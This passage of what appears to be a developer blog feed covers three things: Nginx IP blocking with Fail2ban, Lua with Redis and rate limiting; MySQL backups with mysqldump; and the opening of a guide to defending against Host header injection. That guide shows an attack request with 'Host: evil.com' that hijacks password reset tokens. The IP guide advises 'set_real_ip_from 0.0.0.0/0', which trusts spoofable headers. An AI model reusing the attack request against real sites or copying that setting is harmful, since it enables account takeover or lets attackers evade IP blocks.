&lt;li&gt;  &lt;strong&gt;Applicable Scenarios&lt;/strong&gt;: High-concurrency scenarios, distributed shared blacklists, and refined strategies.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Nginx Built-in Modules
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Implementation Method&lt;/strong&gt;: Uses the limit_req_zone and limit_conn_zone to limit the request frequency and concurrency.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Advantages&lt;/strong&gt;: Native support, no third-party dependencies required.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Disadvantages&lt;/strong&gt;: Only limits traffic and connections, and cannot truly block IPs.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Applicable Scenarios&lt;/strong&gt;: Protects against CC attacks and prevents single-IP abuse.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Configuration Key Points for Each Solution
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Dynamic Blocking with Fail2ban
&lt;/h3&gt;

&lt;p&gt;Fail2ban monitors Nginx logs (such as 403/401/404 error codes, IPs with overly frequent access) and dynamically calls iptables or firewalld to block IPs. The core steps are as follows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Install Fail2ban&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  On Debian/Ubuntu: &lt;code&gt;sudo apt-get install fail2ban&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  On CentOS/RHEL: &lt;code&gt;sudo yum install fail2ban&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;&lt;p&gt;&lt;strong&gt;Configure Nginx Logs&lt;/strong&gt;:&lt;br&gt;&lt;br&gt;
&lt;/p&gt;&lt;/li&gt;

&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;log_format main '$remote_addr - $remote_user [$time_local]"$request"''$status $body_bytes_sent "$http_referer" ''"$http_user_agent""$http_x_forwarded_for"';
access_log /var/log/nginx/access.log main;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Create a Filter Rule&lt;/strong&gt; &lt;code&gt;/etc/fail2ban/filter.d/nginx-cc.conf&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[Definition]
failregex = ^&amp;lt;HOST&amp;gt; -.*"(GET|POST).*HTTP.*" 403
ignoreregex =
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Configure Jail&lt;/strong&gt; &lt;code&gt;/etc/fail2ban/jail.local&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[nginx-cc]
enabled = true
port = http,https
filter = nginx-cc
logpath = /var/log/nginx/access.log
maxretry = 100
findtime = 60
bantime = 3600
action = iptables[name=NGINX, port=http, protocol=tcp]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Start the Service&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo systemctl enable fail2ban
sudo systemctl restart fail2ban
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Dynamic Blocking with Nginx Lua + Redis
&lt;/h3&gt;

&lt;p&gt;This solution depends on OpenResty (which integrates Nginx + LuaJIT) and queries the Redis blacklist immediately when a request arrives, with extremely high efficiency. The core steps are as follows:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Install OpenResty&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;sudo yum install yum-utils
sudo yum-config-manager --add-repo https://openresty.org/package/centos/openresty.repo
sudo yum install openresty
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Configure Nginx&lt;/strong&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http {
    lua_shared_dict ip_blacklist 10m;
    server {
        listen 80;
        location / {access_by_lua_file /etc/nginx/lua/ip_blacklist.lua;}
    }
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Write the Lua Script&lt;/strong&gt; &lt;code&gt;/etc/nginx/lua/ip_blacklist.lua&lt;/code&gt;:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;local redis = require "resty.redis"
local red = redis:new()
red:set_timeout(1000)
local ok, err = red:connect("127.0.0.1", 6379)
if not ok then
    ngx.log(ngx.ERR, "Redis connection failed:", err)
    return
end
local client_ip = ngx.var.remote_addr
local is_banned = red:sismember("ip_blacklist", client_ip)
if is_banned == 1 then
    ngx.exit(ngx.HTTP_FORBIDDEN)
end
red:set_keepalive(10000, 100)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Manage the Blacklist&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  To ban an IP: &lt;code&gt;redis-cli SADD ip_blacklist 192.168.1.100&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  To unban an IP: &lt;code&gt;redis-cli SREM ip_blacklist 192.168.1.100&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h3&gt;
  
  
  Rate Limiting with Nginx Built-in Modules
&lt;/h3&gt;

&lt;p&gt;Nginx has built-in limit_req_zone and limit_conn_zone modules, which can limit the request rate and the number of concurrent connections. Although they cannot truly block IPs, they can effectively mitigate CC attacks. The configuration example is as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;http {
    limit_req_zone $binary_remote_addr zone=req_limit:10m rate=10r/s;
    limit_conn_zone $binary_remote_addr zone=conn_limit:10m;
    server {
        location / {
            limit_req zone=req_limit burst=20 nodelay;
            limit_conn conn_limit 10;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Effect: Requests exceeding the limit will return a 503 Service Temporarily Unavailable response.&lt;/p&gt;

&lt;h2&gt;
  
  
  Practical Experience and Precautions
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Ensure Obtaining the Real IP&lt;/strong&gt;: In the case of having a CDN or proxy, remember to configure the following:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;set_real_ip_from 0.0.0.0/0;
real_ip_header X-Forwarded-For;
real_ip_recursive on;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Combined Measures are More Effective&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Fail2ban → Blocks IPs with malicious behaviors.&lt;/li&gt;
&lt;li&gt;  Nginx built-in rate limiting → Protects against instantaneous high-frequency attacks.&lt;/li&gt;
&lt;li&gt;  Lua + Redis → Enables distributed real-time blacklists.&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;li&gt;

&lt;p&gt;&lt;strong&gt;Layered Blocking Strategies&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Instant protection: Use limit_req/limit_conn.&lt;/li&gt;
&lt;li&gt;  Short-term blocking: Employ Fail2ban (from minutes to hours).&lt;/li&gt;
&lt;li&gt;  Long-term global blocking: Utilize Lua + Redis (for days or even permanently).&lt;/li&gt;
&lt;/ul&gt;


&lt;/li&gt;

&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;There are mainly three ways to implement dynamic IP blocking in Nginx:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  Fail2ban: Log-driven, suitable for single-machine and simple scenarios.&lt;/li&gt;
&lt;li&gt;  Nginx Lua + Redis: High-performance real-time blacklist, suitable for distributed and large-scale businesses.&lt;/li&gt;
&lt;li&gt;  Nginx built-in modules: Native rate limiting and connection limiting, suitable for dealing with CC attacks.It is recommended to implement the following in practice: For single machines, use Fail2ban + built-in rate limiting; for distributed/high-concurrency scenarios, use Lua + Redis + built-in rate limiting. This can not only achieve quick results but also take into account long-term scalability.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>nginx</category>
      <category>security</category>
    </item>
    <item>
      <title>Complete Guide to MySQL Backup: mysqldump Syntax, Advanced Tips &amp; Restoration Practice</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Thu, 06 Nov 2025 07:11:14 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/complete-guide-to-mysql-backup-mysqldump-syntax-advanced-tips-restoration-practice-ape</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/complete-guide-to-mysql-backup-mysqldump-syntax-advanced-tips-restoration-practice-ape</guid>
      <description>&lt;p&gt;For backend developers, database administrators (DBAs), and DevOps engineers, &lt;strong&gt;MySQL data backup&lt;/strong&gt; is a core component of ensuring business continuity. Whether addressing server failures, human errors, or data migration needs, a reliable backup strategy prevents catastrophic data loss. As a built-in command-line backup tool for MySQL, &lt;strong&gt;mysqldump&lt;/strong&gt; stands out as the top choice for small to medium-sized database backups due to its lightweight design, flexibility, and strong compatibility. This article breaks down mysqldump usage from basic syntax to enterprise-grade advanced techniques, helping you build a secure and efficient MySQL backup system.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/complete-guide-to-mysql-backup-mysqldump-syntax-advanced-tips-restoration-practice.html" rel="noopener noreferrer"&gt;# Complete Guide to MySQL Backup: mysqldump Syntax, Advanced Tips &amp;amp; Restoration Practice&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  I. mysqldump Basic Syntax: From Beginner to Pro
&lt;/h2&gt;

&lt;p&gt;The core function of mysqldump is to export data and table structures from a MySQL database into a SQL text file. Its basic command format follows the logic of “parameters + target + output”. Mastering basic syntax is the foundation for meeting diverse backup requirements.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 Standard Command for Backing Up a Single Database
&lt;/h3&gt;

&lt;p&gt;The most common scenario is backing up a specific database, with the full command as follows:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u [username] -p[password] [database_name] &amp;gt; [output_file.sql]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Detailed explanation of each parameter:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;-u [username]&lt;/strong&gt; : Specifies the username for connecting to MySQL, such as root or a dedicated account with backup permissions.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;-p&lt;/strong&gt;: Follows with the password (no space in between). If you only write &lt;code&gt;-p&lt;/code&gt; without the password, the system will prompt for interactive input (more secure).&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;[database_name]&lt;/strong&gt; : Replace with the name of the target database to back up, e.g., “ecommerce_db”.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;&amp;gt; [output_file.sql]&lt;/strong&gt; : Uses a redirection symbol to write backup content into a specified SQL file. It’s recommended to use clear naming conventions.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;💡 &lt;strong&gt;Best Practice&lt;/strong&gt;: In production environments, avoid exposing passwords directly in the command line (they will be recorded in history). Instead, use &lt;code&gt;mysqldump -u username -p database_name &amp;gt; backup.sql&lt;/code&gt; and enter the password interactively afterward.&lt;/p&gt;

&lt;h2&gt;
  
  
  II. Common mysqldump Parameters: Key to On-Demand Backups
&lt;/h2&gt;

&lt;p&gt;Depending on business needs, you may only need to back up table structures, export data, or handle multiple databases simultaneously. mysqldump offers a rich set of parameter combinations to meet backup requirements for different scenarios.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Backup Structure + Data (Default Behavior)
&lt;/h3&gt;

&lt;p&gt;Without specifying special parameters, mysqldump automatically backs up both table structures (CREATE TABLE statements) and data (INSERT statements). This is ideal for full migrations or complete backups:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p ecommerce_db &amp;gt; ecommerce_full_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.2 Backup Only Table Structure (No Data)
&lt;/h3&gt;

&lt;p&gt;When you need to replicate a database schema without actual data (e.g., setting up a test environment), add the &lt;code&gt;--no-data&lt;/code&gt; parameter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --no-data ecommerce_db &amp;gt; ecommerce_schema_only.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 Backup Only Data (No Structure)
&lt;/h3&gt;

&lt;p&gt;If the table structure already exists and you only need to update data (e.g., incremental supplements), use the &lt;code&gt;--no-create-info&lt;/code&gt; parameter to exclude table structure statements:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --no-create-info ecommerce_db &amp;gt; ecommerce_data_only.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.4 Backup Multiple Databases
&lt;/h3&gt;

&lt;p&gt;To back up multiple independent databases at once, use the &lt;code&gt;--databases&lt;/code&gt; parameter and list the databases (separated by spaces):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --databases ecommerce_db blog_db user_center &amp;gt; multi_db_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.5 Backup All Databases
&lt;/h3&gt;

&lt;p&gt;For small servers or scenarios requiring full-server backups, use the &lt;code&gt;--all-databases&lt;/code&gt; parameter to back up all databases in MySQL with one command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --all-databases &amp;gt; mysql_full_server_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  III. Advanced mysqldump Tips: Boost Backup Efficiency &amp;amp; Security
&lt;/h2&gt;

&lt;p&gt;In real-world operations, basic backups alone may not meet performance, storage, or automation needs. The following advanced tips help optimize backup workflows for enterprise-level scenarios.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Add Timestamps to Backup Files
&lt;/h3&gt;

&lt;p&gt;Manually naming backup files can lead to version confusion. Embed a timestamp (year-month-day_hour-minute-second) using &lt;code&gt;$(date +%Y%m%d_%H%M%S)&lt;/code&gt; to enable automatic version management for backup files:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p ecommerce_db &amp;gt; ecommerce_backup_$(date +%Y%m%d_%H%M%S).sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After execution, a file like “ecommerce_backup_20251101_153045.sql” will be generated, making it easy to trace the backup time.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.2 Compress Backup Files to Reduce Storage Usage
&lt;/h3&gt;

&lt;p&gt;Backup files for large databases are often bulky. Use a pipe (&lt;code&gt;|&lt;/code&gt;) with &lt;code&gt;gzip&lt;/code&gt; for direct compression, which can save 70%-90% of storage space:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p ecommerce_db | gzip &amp;gt; ecommerce_backup_$(date +%Y%m%d).sql.gz
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;To restore, first decompress: &lt;code&gt;gunzip ecommerce_backup_20251101.sql.gz&lt;/code&gt;, then run the restoration command.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.3 Exclude Specific Tables (Remove Redundant Data)
&lt;/h3&gt;

&lt;p&gt;Some tables (e.g., log tables, temporary tables) don’t require frequent backups. Use the &lt;code&gt;--ignore-table&lt;/code&gt; parameter to exclude them, in the format &lt;code&gt;--ignore-table=database_name.table_name&lt;/code&gt;. For multiple tables, repeat the parameter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p ecommerce_db --ignore-table=ecommerce_db.access_log --ignore-table=ecommerce_db.temp_session &amp;gt; filtered_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3.4 Table Locking &amp;amp; Transaction Control (InnoDB Optimization)
&lt;/h3&gt;

&lt;p&gt;For InnoDB databases, add the &lt;code&gt;--single-transaction&lt;/code&gt; parameter to create a consistent snapshot during backups, avoiding table locks that disrupt business read/write operations:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysqldump -u root -p --single-transaction ecommerce_db &amp;gt; innodb_consistent_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If using the MyISAM engine (which doesn’t support transactions), use &lt;code&gt;--lock-tables&lt;/code&gt; to lock backup tables and ensure data consistency.&lt;/p&gt;

&lt;h2&gt;
  
  
  IV. MySQL Backup Restoration Practice: From Backup File to Database
&lt;/h2&gt;

&lt;p&gt;The ultimate value of backups lies in restoration. Mastering the correct restoration process is the final line of defense for data security. MySQL restoration typically uses the &lt;code&gt;mysql&lt;/code&gt; command to execute the backed-up SQL file.&lt;/p&gt;

&lt;h3&gt;
  
  
  4.1 Regular Restoration Steps
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; Ensure the target database exists (if not, first run &lt;code&gt;CREATE DATABASE ecommerce_db;&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt; Execute the restoration command to import the SQL file into the database:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;mysql -u root -p ecommerce_db &amp;lt; ecommerce_full_backup.sql
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.2 Direct Restoration from Compressed Files (No Decompression Needed)
&lt;/h3&gt;

&lt;p&gt;For .gz compressed backup files, you can use a pipe to decompress and restore directly, eliminating intermediate steps:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;gunzip -c ecommerce_backup_20251101.sql.gz | mysql -u root -p ecommerce_db
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4.3 Restore to a New Database (Avoid Data Overwriting)
&lt;/h3&gt;

&lt;p&gt;To verify backup files or test restoration effectiveness, it’s recommended to restore to a newly created test database instead of overwriting the production database. Follow these steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Create a test database: &lt;code&gt;mysql -u root -p -e "CREATE DATABASE ecommerce_test;"&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; Run the restoration: &lt;code&gt;mysql -u root -p ecommerce_test &amp;lt; ecommerce_full_backup.sql&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt; Verify data: Log in to the test database to check table structures and data integrity, e.g., &lt;code&gt;mysql -u root -p ecommerce_test -e "SELECT COUNT(*) FROM orders;"&lt;/code&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  V. mysqldump Usage Notes &amp;amp; Risk Mitigation
&lt;/h2&gt;

&lt;p&gt;When using mysqldump in production environments, mastering operations is not enough—you must also address potential risks. Below are practice-proven key notes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Password Security Enhancement&lt;/strong&gt;: If the system enables command history (e.g., the &lt;code&gt;history&lt;/code&gt; command in Linux), writing passwords directly in the command line leads to password leaks. Beyond interactive input, you can set login credentials via the MySQL configuration file (my.cnf). Add &lt;code&gt;user=backup_user password=your_secure_password&lt;/code&gt; under the [mysqldump] section, and restrict the configuration file permissions to &lt;code&gt;chmod 600 my.cnf&lt;/code&gt; to prevent access by other users.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Principle of Least Privilege&lt;/strong&gt;: Avoid using the root account for backups. Instead, create a dedicated backup account and assign only the minimum necessary permissions. For example:&lt;code&gt;GRANT SELECT, SHOW VIEW, LOCK TABLES, RELOAD ON *.* TO 'backup_user'@'localhost' IDENTIFIED BY 'secure_pass';&lt;/code&gt;The RELOAD permission is used to refresh logs, ensuring consistency of binary logs during backups.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Performance Optimization for Large Databases&lt;/strong&gt;: For databases larger than 10GB, the default backup method may be time-consuming and memory-intensive. Add the &lt;code&gt;--quick&lt;/code&gt; parameter to make mysqldump read data from large tables row by row, avoiding loading all data into memory at once. Combine it with &lt;code&gt;--extended-insert&lt;/code&gt; (enabled by default) to merge multiple INSERT statements, reducing backup file size and restoration time. It’s also recommended to run backups during off-peak hours (e.g., midnight) and use &lt;code&gt;nohup&lt;/code&gt; or background processes to prevent backup interruptions due to terminal disconnections:&lt;code&gt;nohup mysqldump -u backup_user -p --single-transaction --quick ecommerce_db | gzip &amp;gt; backup_20251101.sql.gz &amp;amp;&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Backup File Verification &amp;amp; Storage&lt;/strong&gt;: After backup completion, in addition to checking file size, generate a checksum with &lt;code&gt;md5sum backup_20251101.sql.gz &amp;gt; backup_md5.txt&lt;/code&gt;. Before restoration, verify file integrity using &lt;code&gt;md5sum -c backup_md5.txt&lt;/code&gt;. For storage, sync backup files to offsite storage (e.g., cloud storage, FTP servers) to avoid losing backup files due to physical server failures.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Recommended Backup Strategy Combination&lt;/strong&gt;: mysqldump is suitable for full backups, but relying solely on full backups leads to long restoration times. It’s recommended to combine binary logs for “full + incremental” backups: Run a full backup once a week (e.g., Sunday), enable binary logs for the rest of the time, and back up log files incrementally. During restoration, first restore the full backup, then apply incremental logs via &lt;code&gt;mysqlbinlog&lt;/code&gt; to minimize data loss risks.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  VI. Conclusion: Building a Reliable MySQL Backup System
&lt;/h2&gt;

&lt;p&gt;As the most basic and classic backup tool in the MySQL ecosystem, mysqldump’s flexibility and compatibility make it irreplaceable for small to medium-sized database scenarios. Through this article, we’ve built a complete mysqldump usage system—from parameter combinations for basic syntax to efficiency optimization with advanced tips, and risk control in restoration practice. However, it’s crucial to remember: &lt;strong&gt;the core goal of backups is recoverability&lt;/strong&gt;. Regular restoration testing (monthly is recommended) is more important than simply creating backups. Only through actual restoration verification can you ensure backup files are valid and restoration processes are smooth, truly safeguarding business data security.&lt;/p&gt;

</description>
      <category>mysql</category>
      <category>backup</category>
    </item>
    <item>
      <title>Nginx Defends HTTP Host Header Attacks Vulnerability: Practical Configuration Guide</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Wed, 05 Nov 2025 09:33:23 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/nginx-defends-http-host-header-attacks-vulnerability-practical-configuration-guide-36jc</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/nginx-defends-http-host-header-attacks-vulnerability-practical-configuration-guide-36jc</guid>
      <description>&lt;p&gt;As a web developer, have you ever overlooked the Host header in HTTP requests? This seemingly ordinary field, once exploited by attackers, can lead to serious security issues such as password reset hijacking, cache poisoning, and even Server-Side Request Forgery (SSRF). This article will start from the vulnerability principle and share 3 battle-tested Nginx defense configuration schemes to help you quickly build the first line of defense for your web application.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/nginx-defends-http-host-header-attacks-vulnerability-practical-configuration-guide.html" rel="noopener noreferrer"&gt;# Nginx Defends HTTP Host Header Attacks Vulnerability: Practical Configuration Guide&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8qw95gl1pjp2viq0koh3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8qw95gl1pjp2viq0koh3.png" width="800" height="533"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. HTTP Host Header Attack (Host Header Injection): Why Is It So Dangerous?
&lt;/h2&gt;

&lt;p&gt;In the HTTP protocol, the Host header is used to specify the target domain name of the request. But many developers don’t know that: &lt;strong&gt;the Host header is completely controlled by the client and belongs to untrusted data&lt;/strong&gt;. The vulnerability caused by failing to verify the legitimacy of the Host header is called &lt;strong&gt;HTTP Host Header Injection Vulnerability&lt;/strong&gt;, which usually has a medium-low risk level but has a wide range of application scenarios and may trigger serious chain reactions. If the back-end application directly uses this field to generate URLs (such as password reset links, page jump addresses), it will create significant security risks.&lt;/p&gt;

&lt;p&gt;Take a typical scenario: A website’s password reset function generates a link through the following code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
$resetUrl = "https://" . $_SERVER['HTTP_HOST'] . "/reset?token=" . $token;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Attackers only need to construct the following request:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
GET /forgot-password HTTP/1.1
Host: evil.com
User-Agent: Mozilla/5.0...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The reset link received by the user will become &lt;code&gt;https://evil.com/reset?token=xxx&lt;/code&gt;. Once the user clicks, the sensitive token will be leaked to the attacker, leading to account theft. This attack method has extremely low cost but can cause fatal consequences. According to the OWASP Security Testing Guide, Host header injection vulnerabilities are often classified into the “Injection Attacks” category and are one of the common configuration vulnerabilities in web applications.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Core Defense Idea: Block Illegal Hosts at the Nginx Layer
&lt;/h2&gt;

&lt;p&gt;The key to defending against Host header attacks is &lt;strong&gt;not trusting the Host value passed by the client&lt;/strong&gt;. The best practice is to verify the legitimacy of the Host header in advance at the Nginx (reverse proxy layer) and only allow predefined legitimate domain names to pass. This can not only reduce the pressure on the back-end application but also block attacks from the source.&lt;/p&gt;

&lt;p&gt;Core principle: All Host headers entering the system must be in the whitelist; requests not in the whitelist will directly return 403 Forbidden.&lt;/p&gt;

&lt;h2&gt;
  
  
  3. 3 Practical Nginx Defense Configuration Schemes
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Scheme 1: Single Domain Name Exact Match (Recommended, Clearest Logic)
&lt;/h3&gt;

&lt;p&gt;Applicable to scenarios with only one main domain name. It judges whether the Host is legitimate through a flag bit to avoid the if nesting trap of Nginx.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
server {
    listen 80;
    server_name devresourcehub.com; # Your legitimate domain name

    # Host header attack protection configuration
    set $host_flag 0; # Initialize flag bit to 0 (illegal)
    if ($host == "devresourcehub.com") { # Match legitimate domain name
        set $host_flag 1; # Set flag bit to 1 (legal)
    }
    if ($host_flag = 0) { # Reject illegal Host directly
        return 403;
    }

    location / {
        root /www/h5;
        index index.php index.html index.htm;
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The advantage of this scheme is simple logic and easy maintenance, even non-professional operation and maintenance personnel can quickly understand and modify it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Scheme 2: Multi-Domain Whitelist (Main Site + Subsite/Test Environment)
&lt;/h3&gt;

